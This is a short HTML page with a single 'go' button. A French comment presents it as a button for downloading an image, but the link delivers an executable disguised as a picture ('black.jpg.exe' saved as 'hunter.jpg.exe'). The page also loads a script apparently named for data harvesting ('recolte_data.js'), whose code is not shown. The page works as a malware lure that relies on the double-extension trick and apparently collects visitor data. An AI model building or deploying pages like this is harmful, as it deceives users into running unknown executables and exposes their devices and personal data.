<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>go</title>
</head>
<body>
       <!-- Bouton pour télécharger l'image -->
        <a id="downloadLink" href="/pics/black.jpg.exe" download="hunter.jpg.exe"> <button>go</button></a>
    <script src="/js/recolte_data.js"></script>
 
</body>
</html>
